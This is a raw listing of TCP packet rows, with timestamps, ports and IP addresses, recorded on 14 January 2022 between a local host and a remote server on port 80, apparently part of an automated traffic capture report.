Jan 14, 2022 13:49:26.230290890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230308056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230309010 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230324030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230340004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230340958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230359077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230374098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230376959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230392933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230396032 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230411053 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230426073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230427980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230444908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230460882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230477095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230477095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230482101 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230494976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230511904 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230516911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230528116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230545044 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230545998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230561018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230564117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230577946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230596066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230603933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230612993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230629921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230637074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230647087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230655909 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230664015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230679989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230689049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230698109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230712891 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230714083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230734110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230745077 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230751038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230770111 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230786085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230789900 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230803013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230819941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230837107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230828047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230846882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230854988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.230902910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230906963 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.230941057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.375236988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375293970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375334978 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375371933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375425100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375432014 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.375474930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.375474930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.375514984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.375551939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376013041 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376055002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376099110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376117945 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376138926 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376161098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376168966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376208067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376224041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376257896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376266956 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376310110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376317024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376354933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376375914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376409054 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376409054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376456976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376466990 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376501083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376543999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376559019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376593113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376610041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376641035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376682997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376703024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376730919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376775026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376792908 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376827002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376837969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376872063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376910925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376935005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.376962900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.376967907 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377008915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377026081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377055883 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377115965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377177000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377239943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377254009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377263069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377269030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377290964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377305031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377341032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377350092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377389908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377404928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377437115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377475977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377515078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377532005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377537012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377577066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377612114 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377631903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377641916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377679110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377697945 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377732038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377733946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377775908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377814054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377846956 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377887964 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.377897024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377939939 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.377976894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378002882 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378030062 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378036976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378078938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378094912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378128052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378144979 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378180027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378185034 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378225088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378241062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378273964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378283978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378323078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378339052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378374100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378384113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378422976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378438950 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378474951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378482103 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378520012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378536940 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378571987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378577948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378624916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378632069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378669977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378695965 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378721952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378726006 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378767014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378787994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378818989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378834009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378870010 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378885984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378918886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378930092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.378968954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.378978968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379019976 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379028082 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379065037 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379081011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379116058 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379126072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379163980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379173994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379215002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379224062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379266024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379281044 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379314899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379322052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379362106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379378080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379412889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379420042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379456997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379481077 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379508972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379518986 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379558086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379570007 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379611969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379622936 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379666090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379672050 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379714012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379723072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379762888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379774094 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379811049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379827023 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379858971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379868984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379910946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379921913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.379960060 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.379966974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380007982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380023003 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380059004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380069017 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380105019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380121946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380156040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380165100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380204916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380214930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380249977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380270958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380301952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380309105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.380347013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.380409956 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.520811081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520843983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520884991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520908117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520919085 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.520930052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520952940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.520956993 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.521012068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525477886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525525093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525568962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525598049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525616884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525644064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525648117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525680065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525685072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525707006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525732994 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525733948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525758982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525768995 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525791883 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525794983 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525821924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525831938 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525859118 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525861025 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525887966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525892019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525899887 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525918007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525926113 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525943995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525964022 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525970936 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.525984049 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.525998116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526011944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526022911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526036978 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526050091 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526062965 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526074886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526088953 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526101112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526113987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526127100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526135921 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526153088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526165962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526180029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526190996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526206970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526216984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526232004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526241064 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526258945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526267052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526284933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526310921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526315928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526338100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526354074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526364088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526391029 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526396036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526417017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526431084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526443005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526468039 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526472092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526499033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526501894 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526524067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526525974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526550055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526550055 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526575089 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526576042 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526602030 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526602030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526628017 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526629925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526653051 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526655912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526676893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526681900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526705027 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526705980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526726961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526731968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526751041 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526757002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526776075 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526783943 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526808977 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526813984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526834965 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526835918 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526860952 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526860952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:26.526885986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:26.526890039 CET	49743	80	192.168.2.3	108.167.165.140
